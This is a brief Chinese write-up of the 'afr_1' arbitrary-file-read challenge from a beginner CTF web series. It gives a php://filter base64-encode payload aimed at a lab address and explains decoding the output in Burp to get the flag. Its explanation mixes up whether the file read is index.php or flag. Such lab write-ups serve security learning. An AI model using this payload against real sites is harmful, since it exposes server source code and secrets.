NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp2024-01-10 18:57:22 afr_1 payload http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag 这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag; BP base64解码得到flag 上一篇:[DM]分类-支持向量机下一篇:NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp